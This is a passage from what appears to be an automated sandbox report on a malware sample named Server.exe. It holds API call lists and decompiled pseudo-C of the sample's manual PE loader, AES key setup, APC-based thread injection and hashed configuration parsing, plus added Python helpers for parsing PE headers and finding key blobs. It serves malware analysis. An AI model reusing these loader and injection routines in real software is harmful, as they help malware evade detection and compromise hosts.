            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0

            APIs
            • SetErrorMode.KERNELBASE(00000400,?,?,01FC0223,?,?), ref: 01FC0E19
            • SetErrorMode.KERNELBASE(00000000,?,?,01FC0223,?,?), ref: 01FC0E1E
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0

            C-Code - Quality: 34%
            			E02022839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v12;
            				void* _v18;
            				char _v20;
            				intOrPtr _t15;
            				void* _t17;
            				intOrPtr _t19;
            				void* _t23;
            
            				_v20 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				_t15 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t15 + 0x202b3e8; // 0x2ca8990
            				_t20 = _t4;
            				_t6 = _t15 + 0x202b174; // 0x650047
            				_t17 = E0202790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
            				if(_t17 < 0) {
            					_t23 = _t17;
            				} else {
            					_t23 = 8;
            					if(_v20 != _t23) {
            						_t23 = 1;
            					} else {
            						_t19 = E0202661C(_t20, _v12);
            						if(_t19 != 0) {
            							 *_a16 = _t19;
            							_t23 = 0;
            						}
            						__imp__#6(_v12);
            					}
            				}
            				return _t23;
            			}


            APIs
              • Part of subcall function 0202790B: SysFreeString.OLEAUT32(?), ref: 020279EA
              • Part of subcall function 0202661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02024B72,004F0053,00000000,?), ref: 02026625
              • Part of subcall function 0202661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02024B72,004F0053,00000000,?), ref: 0202664F
              • Part of subcall function 0202661C: memset.NTDLL ref: 02026663
            • SysFreeString.OLEAUT32(00000000), ref: 0202289C
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0

            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}


            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0

            C-Code - Quality: 100%
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}


            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0

            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}


            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0

            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax; // __eax: base of the raw PE image that is about to be mapped manually
            				_t16 =  *0x404180;
            				// PE header walk: base+0x3c is IMAGE_DOS_HEADER.e_lfanew, NT headers+0x50 is OptionalHeader.SizeOfImage
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				// E00401202 resolves the APIs it needs (GetModuleHandleA / GetProcAddress, see APIs below), returns the destination base in _v8 and a context in _v12
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41); // copies the image (_t33 bytes) from _t41 to the new base _t40 (inferred from the argument order)
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; // NT headers of the mapped copy
            						_t24 = E00401000(_t40, _t44); // executed; resolves imports (LoadLibraryA in the subcall)
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed; applies section protections (VirtualProtect in the subcall)
            							_t29 = _t26;
            							if(_t29 == 0) {
            								// call base + OptionalHeader.AddressOfEntryPoint (NT+0x28) as DllMain(base, DLL_PROCESS_ATTACH = 1, 0)
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42)); // release the context returned by E00401202 through the function pointers it holds
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}

            Instruction address range: 0x00401303 to 0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%
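            The function E004012FB above is a manual PE loader: it reads e_lfanew at base+0x3c, SizeOfImage at NT+0x50, copies the image to a new base, resolves imports (LoadLibraryA), sets section protections (VirtualProtect) and finally calls base + AddressOfEntryPoint (NT+0x28) with (base, 1, 0), i.e. DllMain with DLL_PROCESS_ATTACH. The Python below is an added example, not code from this report or from the sample: it walks the same header fields over a constructed PE32 DLL, lays the file out in memory the way the loader does and derives the VirtualProtect constant per section from the section flags. The DLL bytes, the function names and the helper layout are constructed for illustration and are not taken from Server.exe.

```python
import struct

# Header offsets the decompiled loader E004012FB reads, relative to the image base
E_LFANEW = 0x3C                    # IMAGE_DOS_HEADER.e_lfanew
NT_NUMBER_OF_SECTIONS = 0x06       # IMAGE_NT_HEADERS32.FileHeader.NumberOfSections
NT_SIZE_OF_OPTIONAL_HEADER = 0x14  # FileHeader.SizeOfOptionalHeader
NT_MAGIC = 0x18                    # OptionalHeader.Magic, 0x10B for PE32
NT_ENTRY_POINT = 0x28              # OptionalHeader.AddressOfEntryPoint (the +0x28 in the decompile)
NT_SIZE_OF_IMAGE = 0x50            # OptionalHeader.SizeOfImage (the +0x50 in the decompile)
NT_SIZE_OF_HEADERS = 0x54          # OptionalHeader.SizeOfHeaders
SECTION_HEADER_SIZE = 0x28
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def parse_headers(img):
    """Walk the headers the way the loader does and return the fields it needs."""
    if len(img) < 0x40 or img[:2] != b"MZ":
        raise ValueError("not an MZ image")
    nt = struct.unpack_from("<I", img, E_LFANEW)[0]
    if nt + 0xF8 > len(img) or img[nt:nt + 4] != b"PE\0\0":   # 0xF8 = sizeof(IMAGE_NT_HEADERS32)
        raise ValueError("e_lfanew does not point at a PE signature")
    if struct.unpack_from("<H", img, nt + NT_MAGIC)[0] != 0x10B:
        raise ValueError("only PE32 is handled here (the sample is a 32-bit PE)")
    nsec = struct.unpack_from("<H", img, nt + NT_NUMBER_OF_SECTIONS)[0]
    first = nt + 0x18 + struct.unpack_from("<H", img, nt + NT_SIZE_OF_OPTIONAL_HEADER)[0]
    sections = []
    for i in range(nsec):
        off = first + i * SECTION_HEADER_SIZE
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", img, off + 8)
        sections.append(dict(name=img[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                             va=va, vsize=vsize, rawptr=rawptr, rawsize=rawsize,
                             chars=struct.unpack_from("<I", img, off + 36)[0]))
    return dict(e_lfanew=nt,
                entry_rva=struct.unpack_from("<I", img, nt + NT_ENTRY_POINT)[0],
                size_of_image=struct.unpack_from("<I", img, nt + NT_SIZE_OF_IMAGE)[0],
                size_of_headers=struct.unpack_from("<I", img, nt + NT_SIZE_OF_HEADERS)[0],
                sections=sections)


def map_image(img):
    """Lay the file out as it sits in memory: headers first, then each section at its RVA."""
    hdr = parse_headers(img)
    mem = bytearray(hdr["size_of_image"])
    mem[:hdr["size_of_headers"]] = img[:hdr["size_of_headers"]]
    for s in hdr["sections"]:
        if s["va"] + s["rawsize"] > len(mem) or s["rawptr"] + s["rawsize"] > len(img):
            raise ValueError("section %s does not fit the image" % s["name"])
        mem[s["va"]:s["va"] + s["rawsize"]] = img[s["rawptr"]:s["rawptr"] + s["rawsize"]]
    return mem


def section_protection(chars):
    """PAGE_* constant a VirtualProtect pass (the role of E004014CF) derives from the section flags."""
    x, r, w = chars & IMAGE_SCN_MEM_EXECUTE, chars & IMAGE_SCN_MEM_READ, chars & IMAGE_SCN_MEM_WRITE
    if x:
        return "PAGE_EXECUTE_READWRITE" if w else ("PAGE_EXECUTE_READ" if r else "PAGE_EXECUTE")
    if w:
        return "PAGE_READWRITE"
    return "PAGE_READONLY" if r else "PAGE_NOACCESS"


def entry_point(img):
    """(RVA, first byte) of the code the loader calls as base + AddressOfEntryPoint with (base, 1, 0)."""
    rva = parse_headers(img)["entry_rva"]
    return rva, map_image(img)[rva]


def build_sample_dll():
    """Constructed 0x600-byte PE32 DLL (not from the sample): .text holds one RET at the entry point, .data holds "config"."""
    img = bytearray(0x600)
    img[:2] = b"MZ"
    nt = 0x40
    struct.pack_into("<I", img, E_LFANEW, nt)
    img[nt:nt + 4] = b"PE\0\0"
    # FileHeader: i386, 2 sections, SizeOfOptionalHeader 0xE0, Characteristics EXECUTABLE|32BIT|DLL
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = nt + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                                  # Magic: PE32
    struct.pack_into("<I", img, nt + NT_ENTRY_POINT, 0x1000)
    struct.pack_into("<III", img, opt + 0x1C, 0x10000000, 0x1000, 0x200)     # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<I", img, nt + NT_SIZE_OF_IMAGE, 0x3000)
    struct.pack_into("<I", img, nt + NT_SIZE_OF_HEADERS, 0x200)
    sec = opt + 0xE0
    for i, (name, va, rawptr, chars) in enumerate([(b".text", 0x1000, 0x200, 0x60000020),
                                                     (b".data", 0x2000, 0x400, 0xC0000040)]):
        off = sec + i * SECTION_HEADER_SIZE
        img[off:off + len(name)] = name
        struct.pack_into("<IIII", img, off + 8, 0x10, va, 0x200, rawptr)     # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        struct.pack_into("<I", img, off + 36, chars)
    img[0x200] = 0xC3                                                        # entry point: RET
    img[0x400:0x406] = b"config"
    return bytes(img)


SAMPLE_DLL = build_sample_dll()

if __name__ == "__main__":
    for s in parse_headers(SAMPLE_DLL)["sections"]:
        print("%-6s rva=%#06x %s" % (s["name"], s["va"], section_protection(s["chars"])))
    print("entry rva=%#x first byte=%#x" % entry_point(SAMPLE_DLL))
```

            Running it on a memory dump instead of the constructed DLL (for example the 0x400000 region this function belongs to) shows the same three fields the loader consumes; a SizeOfImage or AddressOfEntryPoint that falls outside the image is the first thing to check when the dump is a partially overwritten header, which the "overwrites its own PE header" signature in this report points at.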

            C-Code - Quality: 75%
            			E02025063(void* __ecx, void* __edx, void* _a4, void* _a8) {
            				void* _t13;
            				void* _t21;
            
            				_t11 =  &_a4;
            				_t21 = 0;
            				__imp__( &_a8); // lstrlen (resolved import, see APIs below)
            				// E02021508: CryptAcquireContextW(PROV_RSA_AES = 0x18, CRYPT_VERIFYCONTEXT), CryptImportKey of a 0x1C-byte
            				// PLAINTEXTKEYBLOB (12-byte header + 16-byte key, i.e. AES-128) and CryptSetKeyParam(KP_IV = 1): sets up the key and IV used on the buffer
            				_t13 = E02021508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
            				if(_t13 == 0) {
            					_t21 = E020233DC(_a8 + _a8); // RtlAllocateHeap, twice the input length
            					if(_t21 != 0) {
            						E020222EA(_a4, _t21, _t23);
            					}
            					E020261DA(_a4);
            				}
            				return _t21;
            			}

            Instruction address range: 0x0202506b to 0x020250b6

            APIs
            • lstrlen.KERNEL32(00000000,00000000,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02025074
              • Part of subcall function 02021508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02025088,00000001,02023ECE,00000000), ref: 02021540
              • Part of subcall function 02021508: memcpy.NTDLL(02025088,02023ECE,00000010,?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740), ref: 02021559
              • Part of subcall function 02021508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02021582
              • Part of subcall function 02021508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0202159A
              • Part of subcall function 02021508: memcpy.NTDLL(00000000,76B5C740,02CA9600,00000010), ref: 020215EC
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: 4d14ea60311f73ee936662a5ce046e1f111b82bfb480b12e878122904b9cf70b
            • Instruction ID: 644a40abf864722077621c52d0b11cb073a4e04ccd79a80a54936afd4d650b0c
            • Opcode Fuzzy Hash: 4d14ea60311f73ee936662a5ce046e1f111b82bfb480b12e878122904b9cf70b
            • Instruction Fuzzy Hash: 1BF0303610022CBACF126E55DC40DDA3FAEEF88364B018023FD098A010DA31D659ABA0
            Uniqueness

            Uniqueness Score: -1.00%
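            The CryptoAPI arguments recorded for the subcall above (dwProvType 0x18 = PROV_RSA_AES with CRYPT_VERIFYCONTEXT, CryptImportKey with dwDataLen 0x1C, CryptSetKeyParam with dwParam 1 = KP_IV) describe a PLAINTEXTKEYBLOB carrying a 16-byte AES key plus an IV, which under CryptoAPI's default mode means AES-128-CBC. The Python below is an added example, not code from this report or from the sample: it builds and parses that blob layout and scans a constructed memory buffer for blobs of exactly that size, which is how an analyst pulls the key out of a process dump taken at the CryptImportKey call. The key bytes, the buffer and the decoy header are constructed; the constants are the documented CryptoAPI values.

```python
import struct

# Values visible in the report's CryptoAPI call arguments
PROV_RSA_AES = 0x18            # dwProvType passed to CryptAcquireContextW
CRYPT_VERIFYCONTEXT = 0xF0000000
KP_IV = 1                      # dwParam passed to CryptSetKeyParam: sets the CBC IV
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
BLOB_HEADER_SIZE = 12          # BLOBHEADER (8 bytes) + DWORD cbKey
CALG_NAMES = {0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
              0x6603: "CALG_3DES", 0x6801: "CALG_RC4"}
HEADER_MAGIC = bytes([PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, 0])  # bType, bVersion, reserved WORD


def build_plaintext_key_blob(alg_id, key):
    """BLOBHEADER{bType, bVersion, reserved, aiKeyAlg} + DWORD cbKey + raw key, as CryptImportKey expects it."""
    return struct.pack("<BBHII", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + bytes(key)


def parse_plaintext_key_blob(blob):
    """Return (algorithm name, key bytes); raise ValueError if the header is not a plaintext symmetric key blob."""
    if len(blob) < BLOB_HEADER_SIZE:
        raise ValueError("truncated blob")
    btype, ver, _reserved, alg, cbkey = struct.unpack_from("<BBHII", blob, 0)
    if btype != PLAINTEXTKEYBLOB or ver != CUR_BLOB_VERSION or alg not in CALG_NAMES:
        raise ValueError("not a PLAINTEXTKEYBLOB with a known symmetric algorithm")
    if len(blob) != BLOB_HEADER_SIZE + cbkey:
        raise ValueError("cbKey %d does not match blob length %d" % (cbkey, len(blob)))
    return CALG_NAMES[alg], blob[BLOB_HEADER_SIZE:]


def find_plaintext_key_blobs(buf, total_len=0x1C):
    """Scan a buffer for blobs of the size the sample passes as dwDataLen (0x1C = 12-byte header + 16-byte key)."""
    hits = []
    pos = buf.find(HEADER_MAGIC)
    while pos != -1:
        try:
            alg, key = parse_plaintext_key_blob(buf[pos:pos + total_len])
            hits.append((pos, alg, key))
        except ValueError:
            pass                # header look-alike that does not validate
        pos = buf.find(HEADER_MAGIC, pos + 1)
    return hits


# Constructed test data (not from the sample): a 16-byte key in padding, then a header look-alike that fails validation
SAMPLE_KEY = bytes(range(16))
SAMPLE_DUMP = b"\x00" * 33 + build_plaintext_key_blob(0x660E, SAMPLE_KEY) + HEADER_MAGIC + b"\xff" * 24

if __name__ == "__main__":
    for off, alg, key in find_plaintext_key_blobs(SAMPLE_DUMP):
        print("offset %d: %s key=%s" % (off, alg, key.hex()))
```

            The 16-byte IV is not part of the blob; it is the buffer the sample hands to CryptSetKeyParam(KP_IV), so a dump taken at that call (or a breakpoint on it) is needed to recover both halves before the data can be decrypted offline.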

            APIs
              • Part of subcall function 01FC1FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FC1C63), ref: 01FC1FDE
              • Part of subcall function 01FC1FCF: GetVersion.KERNEL32(?,01FC1C63), ref: 01FC1FED
              • Part of subcall function 01FC1FCF: GetCurrentProcessId.KERNEL32(?,01FC1C63), ref: 01FC2009
              • Part of subcall function 01FC1FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FC1C63), ref: 01FC2022
              • Part of subcall function 01FC154D: RtlAllocateHeap.NTDLL(00000000,?,01FC1477), ref: 01FC1559
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FC1C8D
            • Sleep.KERNEL32(00000000,00000030), ref: 01FC1CD4
            • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 01FC1CFC
            • GetSystemDefaultUILanguage.KERNEL32 ref: 01FC1D06
            • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 01FC1D19
            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 01FC1D8E
            • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 01FC1DA4
            • GetLastError.KERNEL32 ref: 01FC1DB4
            • TerminateThread.KERNEL32(00000000,00000000), ref: 01FC1DBE
            • SetLastError.KERNEL32(00000000), ref: 01FC1DCA
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01FC1DD7
            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 01FC1DE9
            • GetLastError.KERNEL32 ref: 01FC1DF4
            • GetLastError.KERNEL32 ref: 01FC1E05
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 1666582358-0
            • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction ID: dd93d442ce7b91c2563cf8e31da3a8f400ebd8d190ca112a4c261394463960e6
            • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction Fuzzy Hash: C151C171D05516FBE721EFB89E489AFBF7CAF45B51B104029F901E2142D731CA10ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E02021D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
            				int _v8;
            				void* _v12;
            				void* _v16;
            				signed int _t28;
            				signed int _t33;
            				signed int _t39;
            				char* _t45;
            				char* _t46;
            				char* _t47;
            				char* _t48;
            				char* _t49;
            				char* _t50;
            				void* _t51;
            				void* _t52;
            				void* _t53;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t57;
            				intOrPtr _t58;
            				signed int _t61;
            				intOrPtr _t64;
            				signed int _t65;
            				signed int _t70;
            				void* _t72;
            				void* _t73;
            				signed int _t75;
            				signed int _t78;
            				signed int _t82;
            				signed int _t86;
            				signed int _t90;
            				signed int _t94;
            				signed int _t98;
            				void* _t101;
            				void* _t102;
            				void* _t116;
            				void* _t119;
            				intOrPtr _t122;
            
            				_t119 = __esi;
            				_t116 = __edi;
            				_t104 = __ecx;
            				_t101 = __ebx;
            				_t28 =  *0x202a344; // 0x43175ac3: seed XOR-ed into every key hash passed to E020210F8 / E020236C5 below
            				// Configuration parsing: each option is looked up by hashed key, converted with StrToIntExA and stored in a global (0x202a374, 0x202a2e0, ...); a missing key keeps the built-in default
            				if(E020210F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
            					 *0x202a374 = _v8;
            				}
            				_t33 =  *0x202a344; // 0x43175ac3
            				if(E020210F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
            					_v12 = 2;
            					L69:
            					return _v12;
            				}
            				_t39 =  *0x202a344; // 0x43175ac3
            				_push(_t116);
            				if(E020210F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
            					L67:
            					HeapFree( *0x202a2d8, 0, _v16);
            					goto L69;
            				} else {
            					_push(_t101);
            					_t102 = _v12;
            					if(_t102 == 0) {
            						_t45 = 0;
            					} else {
            						_t98 =  *0x202a344; // 0x43175ac3
            						_t45 = E020236C5(_t104, _t102, _t98 ^ 0x523046bc);
            					}
            					_push(_t119);
            					if(_t45 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
            							 *0x202a2e0 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t46 = 0;
            					} else {
            						_t94 =  *0x202a344; // 0x43175ac3
            						_t46 = E020236C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
            					}
            					if(_t46 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
            							 *0x202a2e4 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t47 = 0;
            					} else {
            						_t90 =  *0x202a344; // 0x43175ac3
            						_t47 = E020236C5(_t104, _t102, _t90 ^ 0x1b5903e6);
            					}
            					if(_t47 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
            							 *0x202a2e8 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t48 = 0;
            					} else {
            						_t86 =  *0x202a344; // 0x43175ac3
            						_t48 = E020236C5(_t104, _t102, _t86 ^ 0x267c2349);
            					}
            					if(_t48 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
            							 *0x202a004 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t49 = 0;
            					} else {
            						_t82 =  *0x202a344; // 0x43175ac3
            						_t49 = E020236C5(_t104, _t102, _t82 ^ 0x167db74c);
            					}
            					if(_t49 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
            							 *0x202a02c = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t50 = 0;
            					} else {
            						_t78 =  *0x202a344; // 0x43175ac3
